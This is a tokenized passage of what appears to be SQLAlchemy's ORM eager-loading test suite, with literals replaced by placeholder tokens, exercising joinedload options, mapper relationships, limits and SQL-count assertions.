{ <EOL> '<STR_LIT>' : relationship ( Address , lazy = '<STR_LIT>' ) } ) <EOL> for q in [ <EOL> sess . query ( User ) . filter ( User . id == <NUM_LIT:7> ) , <EOL> sess . query ( User ) . filter ( User . id == <NUM_LIT:7> ) . limit ( <NUM_LIT:1> ) <EOL> ] : <EOL> sess . expunge_all ( ) <EOL> eq_ ( q . all ( ) , <EOL> [ User ( id = <NUM_LIT:7> , addresses = [ Address ( id = <NUM_LIT:1> ) ] ) ] <EOL> ) <EOL> sess . expunge_all ( ) <EOL> u = sess . query ( User ) . get ( <NUM_LIT:7> ) <EOL> def go ( ) : <EOL> eq_ ( u . addresses [ <NUM_LIT:0> ] . user_id , <NUM_LIT:7> ) <EOL> self . assert_sql_count ( testing . db , go , <NUM_LIT:1> ) <EOL> sa . orm . clear_mappers ( ) <EOL> mapper ( User , users , properties = { <EOL> '<STR_LIT>' : relationship ( Address , lazy = '<STR_LIT>' , <EOL> order_by = addresses . c . id ) } ) <EOL> mapper ( Address , addresses , properties = { <EOL> '<STR_LIT>' : deferred ( addresses . c . 
user_id ) , <EOL> '<STR_LIT>' : relationship ( Dingaling , lazy = '<STR_LIT>' ) } ) <EOL> mapper ( Dingaling , dingalings , properties = { <EOL> '<STR_LIT>' : deferred ( dingalings . c . address_id ) } ) <EOL> sess . expunge_all ( ) <EOL> def go ( ) : <EOL> u = sess . query ( User ) . get ( <NUM_LIT:8> ) <EOL> eq_ ( User ( id = <NUM_LIT:8> , <EOL> addresses = [ Address ( id = <NUM_LIT:2> , dingalings = [ Dingaling ( id = <NUM_LIT:1> ) ] ) , <EOL> Address ( id = <NUM_LIT:3> ) , <EOL> Address ( id = <NUM_LIT:4> ) ] ) , <EOL> u ) <EOL> self . assert_sql_count ( testing . db , go , <NUM_LIT:1> ) <EOL> def test_options_pathing ( self ) : <EOL> users , Keyword , orders , items , order_items , Order , Item , User , keywords , item_keywords = ( <EOL> self . tables . users , <EOL> self . classes . Keyword , <EOL> self . tables . orders , <EOL> self . tables . items , <EOL> self . tables . order_items , <EOL> self . classes . Order , <EOL> self . classes . Item , <EOL> self . classes . User , <EOL> self . tables . keywords , <EOL> self . tables . item_keywords ) <EOL> mapper ( User , users , properties = { <EOL> '<STR_LIT>' : relationship ( Order , order_by = orders . c . id ) , <EOL> } ) <EOL> mapper ( Order , orders , properties = { <EOL> '<STR_LIT>' : relationship ( <EOL> Item , <EOL> secondary = order_items , order_by = items . c . id ) , <EOL> } ) <EOL> mapper ( Item , items , properties = { <EOL> '<STR_LIT>' : relationship ( Keyword , <EOL> secondary = item_keywords , <EOL> order_by = keywords . c . id ) <EOL> } ) <EOL> mapper ( Keyword , keywords ) <EOL> for opt , count in [ <EOL> ( ( <EOL> joinedload ( User . orders , Order . items ) , <EOL> ) , <NUM_LIT:10> ) , <EOL> ( ( joinedload ( "<STR_LIT>" ) , ) , <NUM_LIT:10> ) , <EOL> ( ( <EOL> joinedload ( User . orders , ) , <EOL> joinedload ( User . orders , Order . items ) , <EOL> joinedload ( User . orders , Order . items , Item . keywords ) , <EOL> ) , <NUM_LIT:1> ) , <EOL> ( ( <EOL> joinedload ( User . 
orders , Order . items , Item . keywords ) , <EOL> ) , <NUM_LIT:10> ) , <EOL> ( ( <EOL> joinedload ( User . orders , Order . items ) , <EOL> joinedload ( User . orders , Order . items , Item . keywords ) , <EOL> ) , <NUM_LIT:5> ) , <EOL> ] : <EOL> sess = create_session ( ) <EOL> def go ( ) : <EOL> eq_ ( <EOL> sess . query ( User ) . options ( * opt ) . order_by ( User . id ) . all ( ) , <EOL> self . static . user_item_keyword_result <EOL> ) <EOL> self . assert_sql_count ( testing . db , go , count ) <EOL> def test_disable_dynamic ( self ) : <EOL> """<STR_LIT>""" <EOL> users , Address , addresses , User = ( <EOL> self . tables . users , <EOL> self . classes . Address , <EOL> self . tables . addresses , <EOL> self . classes . User ) <EOL> mapper ( User , users , properties = { <EOL> '<STR_LIT>' : relationship ( Address , lazy = "<STR_LIT>" ) <EOL> } ) <EOL> mapper ( Address , addresses ) <EOL> sess = create_session ( ) <EOL> assert_raises_message ( <EOL> sa . exc . InvalidRequestError , <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" , <EOL> sess . query ( User ) . options ( joinedload ( User . addresses ) ) . first , <EOL> ) <EOL> def test_many_to_many ( self ) : <EOL> keywords , items , item_keywords , Keyword , Item = ( <EOL> self . tables . keywords , <EOL> self . tables . items , <EOL> self . tables . item_keywords , <EOL> self . classes . Keyword , <EOL> self . classes . Item ) <EOL> mapper ( Keyword , keywords ) <EOL> mapper ( Item , items , properties = dict ( <EOL> keywords = relationship ( Keyword , secondary = item_keywords , <EOL> lazy = '<STR_LIT>' , order_by = keywords . c . id ) ) ) <EOL> q = create_session ( ) . query ( Item ) . order_by ( Item . id ) <EOL> def go ( ) : <EOL> eq_ ( self . static . item_keyword_result , q . all ( ) ) <EOL> self . assert_sql_count ( testing . db , go , <NUM_LIT:1> ) <EOL> def go ( ) : <EOL> eq_ ( self . static . item_keyword_result [ <NUM_LIT:0> : <NUM_LIT:2> ] , <EOL> q . join ( '<STR_LIT>' ) . filter ( Keyword . 
name == '<STR_LIT>' ) . all ( ) ) <EOL> self . assert_sql_count ( testing . db , go , <NUM_LIT:1> ) <EOL> def go ( ) : <EOL> eq_ ( self . static . item_keyword_result [ <NUM_LIT:0> : <NUM_LIT:2> ] , <EOL> ( q . join ( '<STR_LIT>' , aliased = True ) . <EOL> filter ( Keyword . name == '<STR_LIT>' ) ) . all ( ) ) <EOL> self . assert_sql_count ( testing . db , go , <NUM_LIT:1> ) <EOL> def test_eager_option ( self ) : <EOL> keywords , items , item_keywords , Keyword , Item = ( <EOL> self . tables . keywords , <EOL> self . tables . items , <EOL> self . tables . item_keywords , <EOL> self . classes . Keyword , <EOL> self . classes . Item ) <EOL> mapper ( Keyword , keywords ) <EOL> mapper ( Item , items , properties = dict ( <EOL> keywords = relationship ( <EOL> Keyword , secondary = item_keywords , lazy = '<STR_LIT>' , <EOL> order_by = keywords . c . id ) ) ) <EOL> q = create_session ( ) . query ( Item ) <EOL> def go ( ) : <EOL> eq_ ( self . static . item_keyword_result [ <NUM_LIT:0> : <NUM_LIT:2> ] , <EOL> ( q . options ( <EOL> joinedload ( '<STR_LIT>' ) <EOL> ) . join ( '<STR_LIT>' ) . <EOL> filter ( keywords . c . name == '<STR_LIT>' ) ) . order_by ( Item . id ) . all ( ) ) <EOL> self . assert_sql_count ( testing . db , go , <NUM_LIT:1> ) <EOL> def test_cyclical ( self ) : <EOL> """<STR_LIT>""" <EOL> Address , addresses , users , User = ( self . classes . Address , <EOL> self . tables . addresses , <EOL> self . tables . users , <EOL> self . classes . User ) <EOL> mapper ( Address , addresses ) <EOL> mapper ( User , users , properties = dict ( <EOL> addresses = relationship ( <EOL> Address , lazy = '<STR_LIT>' , <EOL> backref = sa . orm . backref ( '<STR_LIT:user>' , lazy = '<STR_LIT>' ) , <EOL> order_by = Address . id ) <EOL> ) ) <EOL> eq_ ( sa . orm . class_mapper ( User ) . get_property ( '<STR_LIT>' ) . lazy , '<STR_LIT>' ) <EOL> eq_ ( sa . orm . class_mapper ( Address ) . get_property ( '<STR_LIT:user>' ) . 
lazy , '<STR_LIT>' ) <EOL> sess = create_session ( ) <EOL> eq_ ( <EOL> self . static . user_address_result , <EOL> sess . query ( User ) . order_by ( User . id ) . all ( ) ) <EOL> def test_double ( self ) : <EOL> """<STR_LIT>""" <EOL> users , orders , User , Address , Order , addresses = ( <EOL> self . tables . users , <EOL> self . tables . orders , <EOL> self . classes . User , <EOL> self . classes . Address , <EOL> self . classes . Order , <EOL> self . tables . addresses ) <EOL> openorders = sa . alias ( orders , '<STR_LIT>' ) <EOL> closedorders = sa . alias ( orders , '<STR_LIT>' ) <EOL> mapper ( Address , addresses ) <EOL> mapper ( Order , orders ) <EOL> open_mapper = mapper ( Order , openorders , non_primary = True ) <EOL> closed_mapper = mapper ( Order , closedorders , non_primary = True ) <EOL> mapper ( User , users , properties = dict ( <EOL> addresses = relationship ( <EOL> Address , lazy = '<STR_LIT>' , order_by = addresses . c . id ) , <EOL> open_orders = relationship ( <EOL> open_mapper , <EOL> primaryjoin = sa . and_ ( openorders . c . isopen == <NUM_LIT:1> , <EOL> users . c . id == openorders . c . user_id ) , <EOL> lazy = '<STR_LIT>' , order_by = openorders . c . id ) , <EOL> closed_orders = relationship ( <EOL> closed_mapper , <EOL> primaryjoin = sa . and_ ( closedorders . c . isopen == <NUM_LIT:0> , <EOL> users . c . id == closedorders . c . user_id ) , <EOL> lazy = '<STR_LIT>' , order_by = closedorders . c . id ) ) ) <EOL> q = create_session ( ) . query ( User ) . order_by ( User . 
id ) <EOL> def go ( ) : <EOL> eq_ ( [ <EOL> User ( <EOL> id = <NUM_LIT:7> , <EOL> addresses = [ Address ( id = <NUM_LIT:1> ) ] , <EOL> open_orders = [ Order ( id = <NUM_LIT:3> ) ] , <EOL> closed_orders = [ Order ( id = <NUM_LIT:1> ) , Order ( id = <NUM_LIT:5> ) ] <EOL> ) , <EOL> User ( <EOL> id = <NUM_LIT:8> , <EOL> addresses = [ Address ( id = <NUM_LIT:2> ) , Address ( id = <NUM_LIT:3> ) , Address ( id = <NUM_LIT:4> ) ] , <EOL> open_orders = [ ] , <EOL> closed_orders = [ ] <EOL> ) , <EOL> User ( <EOL> id = <NUM_LIT:9> , <EOL> addresses = [ Address ( id = <NUM_LIT:5> ) ] , <EOL> open_orders = [ Order ( id = <NUM_LIT:4> ) ] , <EOL> closed_orders = [ Order ( id = <NUM_LIT:2> ) ] <EOL> ) , <EOL> User ( id = <NUM_LIT:10> ) <EOL> ] , q . all ( ) ) <EOL> self . assert_sql_count ( testing . db , go , <NUM_LIT:1> ) <EOL> def test_double_same_mappers ( self ) : <EOL> """<STR_LIT>""" <EOL> addresses , items , order_items , orders , Item , User , Address , Order , users = ( <EOL> self . tables . addresses , <EOL> self . tables . items , <EOL> self . tables . order_items , <EOL> self . tables . orders , <EOL> self . classes . Item , <EOL> self . classes . User , <EOL> self . classes . Address , <EOL> self . classes . Order , <EOL> self . tables . users ) <EOL> mapper ( Address , addresses ) <EOL> mapper ( Order , orders , properties = { <EOL> '<STR_LIT>' : relationship ( Item , secondary = order_items , lazy = '<STR_LIT>' , <EOL> order_by = items . c . id ) } ) <EOL> mapper ( Item , items ) <EOL> mapper ( User , users , properties = dict ( <EOL> addresses = relationship ( <EOL> Address , lazy = '<STR_LIT>' , order_by = addresses . c . id ) , <EOL> open_orders = relationship ( <EOL> Order , <EOL> primaryjoin = sa . and_ ( orders . c . isopen == <NUM_LIT:1> , <EOL> users . c . id == orders . c . user_id ) , <EOL> lazy = '<STR_LIT>' , order_by = orders . c . id ) , <EOL> closed_orders = relationship ( <EOL> Order , <EOL> primaryjoin = sa . and_ ( orders . c . 
isopen == <NUM_LIT:0> , <EOL> users . c . id == orders . c . user_id ) , <EOL> lazy = '<STR_LIT>' , order_by = orders . c . id ) ) ) <EOL> q = create_session ( ) . query ( User ) . order_by ( User . id ) <EOL> def go ( ) : <EOL> eq_ ( [ <EOL> User ( id = <NUM_LIT:7> , <EOL> addresses = [ <EOL> Address ( id = <NUM_LIT:1> ) ] , <EOL> open_orders = [ Order ( id = <NUM_LIT:3> , <EOL> items = [ <EOL> Item ( id = <NUM_LIT:3> ) , <EOL> Item ( id = <NUM_LIT:4> ) , <EOL> Item ( id = <NUM_LIT:5> ) ] ) ] , <EOL> closed_orders = [ Order ( id = <NUM_LIT:1> , <EOL> items = [ <EOL> Item ( id = <NUM_LIT:1> ) , <EOL> Item ( id = <NUM_LIT:2> ) , <EOL> Item ( id = <NUM_LIT:3> ) ] ) , <EOL> Order ( id = <NUM_LIT:5> , <EOL> items = [ <EOL> Item ( id = <NUM_LIT:5> ) ] ) ] ) , <EOL> User ( id = <NUM_LIT:8> , <EOL> addresses = [ <EOL> Address ( id = <NUM_LIT:2> ) , <EOL> Address ( id = <NUM_LIT:3> ) , <EOL> Address ( id = <NUM_LIT:4> ) ] , <EOL> open_orders = [ ] , <EOL> closed_orders = [ ] ) , <EOL> User ( id = <NUM_LIT:9> , <EOL> addresses = [ <EOL> Address ( id = <NUM_LIT:5> ) ] , <EOL> open_orders = [ <EOL> Order ( id = <NUM_LIT:4> , <EOL> items = [ <EOL> Item ( id = <NUM_LIT:1> ) , <EOL> Item ( id = <NUM_LIT:5> ) ] ) ] , <EOL> closed_orders = [ <EOL> Order ( id = <NUM_LIT:2> , <EOL> items = [ <EOL> Item ( id = <NUM_LIT:1> ) , <EOL> Item ( id = <NUM_LIT:2> ) , <EOL> Item ( id = <NUM_LIT:3> ) ] ) ] ) , <EOL> User ( id = <NUM_LIT:10> ) <EOL> ] , q . all ( ) ) <EOL> self . assert_sql_count ( testing . db , go , <NUM_LIT:1> ) <EOL> def test_no_false_hits ( self ) : <EOL> """<STR_LIT>""" <EOL> addresses , orders , User , Address , Order , users = ( <EOL> self . tables . addresses , <EOL> self . tables . orders , <EOL> self . classes . User , <EOL> self . classes . Address , <EOL> self . classes . Order , <EOL> self . tables . 
users ) <EOL> mapper ( User , users , properties = { <EOL> '<STR_LIT>' : relationship ( Address , lazy = '<STR_LIT>' ) , <EOL> '<STR_LIT>' : relationship ( Order , lazy = '<STR_LIT>' ) <EOL> } ) <EOL> mapper ( Address , addresses ) <EOL> mapper ( Order , orders ) <EOL> self . allusers = create_session ( ) . query ( User ) . all ( ) <EOL> noeagers = create_session ( ) . query ( User ) . from_statement ( text ( "<STR_LIT>" ) ) . all ( ) <EOL> assert '<STR_LIT>' not in noeagers [ <NUM_LIT:0> ] . __dict__ <EOL> assert '<STR_LIT>' not in noeagers [ <NUM_LIT:0> ] . __dict__ <EOL> def test_limit ( self ) : <EOL> """<STR_LIT>""" <EOL> users , items , order_items , orders , Item , User , Address , Order , addresses = ( <EOL> self . tables . users , <EOL> self . tables . items , <EOL> self . tables . order_items , <EOL> self . tables . orders , <EOL> self . classes . Item , <EOL> self . classes . User , <EOL> self . classes . Address , <EOL> self . classes . Order , <EOL> self . tables . addresses ) <EOL> mapper ( Item , items ) <EOL> mapper ( Order , orders , properties = { <EOL> '<STR_LIT>' : relationship ( Item , secondary = order_items , lazy = '<STR_LIT>' , <EOL> order_by = items . c . id ) <EOL> } ) <EOL> mapper ( User , users , properties = { <EOL> '<STR_LIT>' : relationship ( <EOL> mapper ( Address , addresses ) , <EOL> lazy = '<STR_LIT>' , order_by = addresses . c . id ) , <EOL> '<STR_LIT>' : relationship ( Order , lazy = '<STR_LIT>' , order_by = orders . c . id ) <EOL> } ) <EOL> sess = create_session ( ) <EOL> q = sess . query ( User ) <EOL> l = q . order_by ( User . id ) . limit ( <NUM_LIT:2> ) . offset ( <NUM_LIT:1> ) . all ( ) <EOL> eq_ ( self . static . user_all_result [ <NUM_LIT:1> : <NUM_LIT:3> ] , l ) <EOL> def test_distinct ( self ) : <EOL> Address , addresses , users , User = ( self . classes . Address , <EOL> self . tables . addresses , <EOL> self . tables . users , <EOL> self . classes . User ) <EOL> u2 = users . alias ( '<STR_LIT>' ) <EOL> s = sa . 
union_all ( <EOL> u2 . select ( use_labels = True ) , u2 . select ( use_labels = True ) , <EOL> u2 . select ( use_labels = True ) ) . alias ( '<STR_LIT:u>' ) <EOL> mapper ( User , users , properties = { <EOL> '<STR_LIT>' : relationship ( <EOL> mapper ( Address , addresses ) , <EOL> lazy = '<STR_LIT>' , order_by = addresses . c . id ) , <EOL> } ) <EOL> sess = create_session ( ) <EOL> q = sess . query ( User ) <EOL> def go ( ) : <EOL> l = q . filter ( s . c . u2_id == User . id ) . distinct ( ) . order_by ( User . id ) . all ( ) <EOL> eq_ ( self . static . user_address_result , l ) <EOL> self . assert_sql_count ( testing . db , go , <NUM_LIT:1> ) <EOL> def test_limit_2 ( self ) : <EOL> keywords , items , item_keywords , Keyword , Item = ( <EOL> self . tables . keywords , <EOL> self . tables . items , <EOL> self . tables . item_keywords , <EOL> self . classes . Keyword , <EOL> self . classes . Item ) <EOL> mapper ( Keyword , keywords ) <EOL> mapper ( Item , items , properties = dict ( <EOL> keywords = relationship ( <EOL> Keyword , secondary = item_keywords , <EOL> lazy = '<STR_LIT>' , order_by = [ keywords . c . id ] ) , <EOL> ) ) <EOL> sess = create_session ( ) <EOL> q = sess . query ( Item ) <EOL> l = q . filter ( ( Item . description == '<STR_LIT>' ) | <EOL> ( Item . description == '<STR_LIT>' ) | <EOL> ( Item . description == '<STR_LIT>' ) ) . order_by ( Item . id ) . limit ( <NUM_LIT:2> ) . all ( ) <EOL> eq_ ( self . static . item_keyword_result [ <NUM_LIT:1> : <NUM_LIT:3> ] , l ) <EOL> def test_limit_3 ( self ) : <EOL> """<STR_LIT>""" <EOL> addresses , items , order_items , orders , Item , User , Address , Order , users = ( <EOL> self . tables . addresses , <EOL> self . tables . items , <EOL> self . tables . order_items , <EOL> self . tables . orders , <EOL> self . classes . Item , <EOL> self . classes . User , <EOL> self . classes . Address , <EOL> self . classes . Order , <EOL> self . tables . 
users ) <EOL> mapper ( Item , items ) <EOL> mapper ( Order , orders , properties = dict ( <EOL> items = relationship ( Item , secondary = order_items , lazy = '<STR_LIT>' ) <EOL> ) ) <EOL> mapper ( Address , addresses ) <EOL> mapper ( User , users , properties = dict ( <EOL> addresses = relationship ( <EOL> Address , lazy = '<STR_LIT>' , order_by = addresses . c . id ) , <EOL> orders = relationship ( Order , lazy = '<STR_LIT>' , order_by = orders . c . id ) , <EOL> ) ) <EOL> sess = create_session ( ) <EOL> q = sess . query ( User ) <EOL> if not testing . against ( '<STR_LIT>' ) : <EOL> l = q . join ( '<STR_LIT>' ) . order_by ( <EOL> Order . user_id . desc ( ) ) . limit ( <NUM_LIT:2> ) . offset ( <NUM_LIT:1> ) <EOL> eq_ ( [ <EOL> User ( id = <NUM_LIT:9> , <EOL> orders = [ Order ( id = <NUM_LIT:2> ) , Order ( id = <NUM_LIT:4> ) ] , <EOL> addresses = [ Address ( id = <NUM_LIT:5> ) ] <EOL> ) , <EOL> User ( id = <NUM_LIT:7> , <EOL> orders = [ Order ( id = <NUM_LIT:1> ) , Order ( id = <NUM_LIT:3> ) , Order ( id = <NUM_LIT:5> ) ] , <EOL> addresses = [ Address ( id = <NUM_LIT:1> ) ] <EOL> ) <EOL> ] , l . all ( ) ) <EOL> l = q . join ( '<STR_LIT>' ) . order_by ( <EOL> Address . email_address . desc ( ) ) . limit ( <NUM_LIT:1> ) . offset ( <NUM_LIT:0> ) <EOL> eq_ ( [ <EOL> User ( id = <NUM_LIT:7> , <EOL> orders = [ Order ( id = <NUM_LIT:1> ) , Order ( id = <NUM_LIT:3> ) , Order ( id = <NUM_LIT:5> ) ] , <EOL> addresses = [ Address ( id = <NUM_LIT:1> ) ] <EOL> ) <EOL> ] , l . all ( ) ) <EOL> def test_limit_4 ( self ) : <EOL> User , Order , addresses , users , orders = ( self . classes . User , <EOL> self . classes . Order , <EOL> self . tables . addresses , <EOL> self . tables . users , <EOL> self . tables . orders ) <EOL> sel = sa . select ( [ users , addresses . c . email_address ] , <EOL> users . c . id == addresses . c . user_id ) . alias ( '<STR_LIT>' ) <EOL> mapper ( User , sel , properties = { <EOL> '<STR_LIT>' : relationship ( <EOL> Order , primaryjoin = sel . c . 
id == orders . c . user_id , <EOL> lazy = '<STR_LIT>' , order_by = orders . c . id ) <EOL> } ) <EOL> mapper ( Order , orders ) <EOL> sess = create_session ( ) <EOL> eq_ ( sess . query ( User ) . first ( ) , <EOL> User ( name = '<STR_LIT>' , orders = [ <EOL> Order ( <EOL> address_id = <NUM_LIT:1> , <EOL> description = '<STR_LIT>' , <EOL> isopen = <NUM_LIT:0> , <EOL> user_id = <NUM_LIT:7> , <EOL> id = <NUM_LIT:1> ) , <EOL> Order ( <EOL> address_id = <NUM_LIT:1> , <EOL> description = '<STR_LIT>' , <EOL> isopen = <NUM_LIT:1> , <EOL> user_id = <NUM_LIT:7> , <EOL> id = <NUM_LIT:3> ) , <EOL> Order ( <EOL> address_id = None , description = '<STR_LIT>' , isopen = <NUM_LIT:0> , <EOL> user_id = <NUM_LIT:7> , id = <NUM_LIT:5> ) ] , <EOL> email_address = '<STR_LIT>' , id = <NUM_LIT:7> ) <EOL> ) <EOL> def test_useget_cancels_eager ( self ) : <EOL> """<STR_LIT>""" <EOL> users , Address , addresses , User = ( <EOL> self . tables . users , <EOL> self . classes . Address , <EOL> self . tables . addresses , <EOL> self . classes . User ) <EOL> mapper ( User , users ) <EOL> mapper ( Address , addresses , properties = { <EOL> '<STR_LIT:user>' : relationship ( User , lazy = '<STR_LIT>' , backref = '<STR_LIT>' ) <EOL> } ) <EOL> sess = create_session ( ) <EOL> u1 = sess . query ( User ) . filter ( User . id == <NUM_LIT:8> ) . one ( ) <EOL> def go ( ) : <EOL> eq_ ( u1 . addresses [ <NUM_LIT:0> ] . user , u1 ) <EOL> self . assert_sql_execution ( <EOL> testing . db , go , <EOL> CompiledSQL ( <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" , <EOL> { '<STR_LIT>' : <NUM_LIT:8> } ) <EOL> ) <EOL> def test_manytoone_limit ( self ) : <EOL> """<STR_LIT>""" <EOL> users , items , order_items , Order , Item , User , Address , orders , addresses = ( <EOL> self . tables . users , <EOL> self . tables . items , <EOL> self . tables . order_items , <EOL> self . classes . Order , <EOL> self . classes . Item , <EOL> self . classes . User , <EOL> self . classes . Address , <EOL> self . 
tables . orders , <EOL> self . tables . addresses ) <EOL> mapper ( User , users , properties = odict ( <EOL> orders = relationship ( Order , backref = '<STR_LIT:user>' ) <EOL> ) ) <EOL> mapper ( Order , orders , properties = odict ( [ <EOL> ( '<STR_LIT>' , relationship ( Item , secondary = order_items , <EOL> backref = '<STR_LIT>' ) ) , <EOL> ( '<STR_LIT:address>' , relationship ( Address ) ) <EOL> ] ) ) <EOL> mapper ( Address , addresses ) <EOL> mapper ( Item , items ) <EOL> sess = create_session ( ) <EOL> self . assert_compile ( <EOL> sess . query ( User ) . options ( joinedload ( User . orders ) ) . limit ( <NUM_LIT:10> ) , <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" , <EOL> { '<STR_LIT>' : <NUM_LIT:10> } <EOL> ) <EOL> self . assert_compile ( <EOL> sess . query ( Order ) . options ( joinedload ( Order . user ) ) . limit ( <NUM_LIT:10> ) , <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" , <EOL> { '<STR_LIT>' : <NUM_LIT:10> } <EOL> ) <EOL> self . assert_compile ( <EOL> sess . query ( Order ) . options ( <EOL> joinedload ( Order . user , innerjoin = True ) ) . limit ( <NUM_LIT:10> ) , <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" , <EOL> { '<STR_LIT>' : <NUM_LIT:10> } <EOL> ) <EOL> self . assert_compile ( <EOL> sess . query ( User ) . options ( <EOL> joinedload_all ( "<STR_LIT>" ) ) . limit ( <NUM_LIT:10> ) , <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" , <EOL> { '<STR_LIT>' : <NUM_LIT:10> } <EOL> ) <EOL> self . assert_compile ( <EOL> sess . query ( User ) . 
options ( joinedload_all ( "<STR_LIT>" ) , <EOL> joinedload ( "<STR_LIT>" ) ) , <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> ) <EOL> self . assert_compile ( <EOL> sess . query ( User ) . options ( <EOL> joinedload ( "<STR_LIT>" ) , <EOL> joinedload ( <EOL> "<STR_LIT>" , <EOL> innerjoin = True ) ) . limit ( <NUM_LIT:10> ) , <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" , <EOL> { '<STR_LIT>' : <NUM_LIT:10> } <EOL> ) <EOL> self . assert_compile ( <EOL> sess . query ( User ) . options ( <EOL> joinedload ( "<STR_LIT>" , innerjoin = True ) , <EOL> joinedload ( "<STR_LIT>" , innerjoin = True ) ) . limit ( <NUM_LIT:10> ) , <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" , <EOL> { '<STR_LIT>' : <NUM_LIT:10> } <EOL> ) <EOL> def test_one_to_many_scalar ( self ) : <EOL> Address , addresses , users , User = ( self . classes . Address , <EOL> self . tables . addresses , <EOL> self . tables . users , <EOL> self . classes . User ) <EOL> mapper ( User , users , properties = dict ( <EOL> address = relationship ( mapper ( Address , addresses ) , <EOL> lazy = '<STR_LIT>' , uselist = False ) <EOL> ) ) <EOL> q = create_session ( ) . query ( User ) <EOL> def go ( ) : <EOL> l = q . filter ( users . c . id == <NUM_LIT:7> ) . 
all ( ) <EOL> eq_ ( [ User ( id = <NUM_LIT:7> , address = Address ( id = <NUM_LIT:1> ) ) ] , l ) <EOL> self . assert_sql_count ( testing . db , go , <NUM_LIT:1> ) <EOL> def test_one_to_many_scalar_subq_wrapping ( self ) : <EOL> Address , addresses , users , User = ( self . classes . Address , <EOL> self . tables . addresses , <EOL> self . tables . users , <EOL> self . classes . User ) <EOL> mapper ( User , users , properties = dict ( <EOL> address = relationship ( mapper ( Address , addresses ) , <EOL> lazy = '<STR_LIT>' , uselist = False ) <EOL> ) ) <EOL> q = create_session ( ) . query ( User ) <EOL> q = q . filter ( users . c . id == <NUM_LIT:7> ) . limit ( <NUM_LIT:1> ) <EOL> self . assert_compile ( <EOL> q , <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" , <EOL> checkparams = { '<STR_LIT>' : <NUM_LIT:7> , '<STR_LIT>' : <NUM_LIT:1> } <EOL> ) <EOL> def test_many_to_one ( self ) : <EOL> users , Address , addresses , User = ( <EOL> self . tables . users , <EOL> self . classes . Address , <EOL> self . tables . addresses , <EOL> self . classes . User ) <EOL> mapper ( Address , addresses , properties = dict ( <EOL> user = relationship ( mapper ( User , users ) , lazy = '<STR_LIT>' ) <EOL> ) ) <EOL> sess = create_session ( ) <EOL> q = sess . query ( Address ) <EOL> def go ( ) : <EOL> a = q . filter ( addresses . c . id == <NUM_LIT:1> ) . one ( ) <EOL> is_not_ ( a . user , None ) <EOL> u1 = sess . query ( User ) . get ( <NUM_LIT:7> ) <EOL> is_ ( a . user , u1 ) <EOL> self . assert_sql_count ( testing . db , go , <NUM_LIT:1> ) <EOL> def test_many_to_one_null ( self ) : <EOL> """<STR_LIT>""" <EOL> Order , Address , addresses , orders = ( self . classes . Order , <EOL> self . classes . Address , <EOL> self . tables . addresses , <EOL> self . tables . 
orders ) <EOL> mapper ( Order , orders , properties = dict ( <EOL> address = relationship ( <EOL> mapper ( Address , addresses ) , <EOL> primaryjoin = and_ ( <EOL> addresses . c . id == orders . c . address_id , <EOL> addresses . c . email_address != None <EOL> ) , <EOL> lazy = '<STR_LIT>' ) <EOL> ) ) <EOL> sess = create_session ( ) <EOL> def go ( ) : <EOL> o1 = sess . query ( Order ) . options ( <EOL> lazyload ( '<STR_LIT:address>' ) ) . filter ( <EOL> Order . id == <NUM_LIT:5> ) . one ( ) <EOL> eq_ ( o1 . address , None ) <EOL> self . assert_sql_count ( testing . db , go , <NUM_LIT:2> ) <EOL> sess . expunge_all ( ) <EOL> def go ( ) : <EOL> o1 = sess . query ( Order ) . filter ( Order . id == <NUM_LIT:5> ) . one ( ) <EOL> eq_ ( o1 . address , None ) <EOL> self . assert_sql_count ( testing . db , go , <NUM_LIT:1> ) <EOL> def test_one_and_many ( self ) : <EOL> """<STR_LIT>""" <EOL> users , items , order_items , orders , Item , User 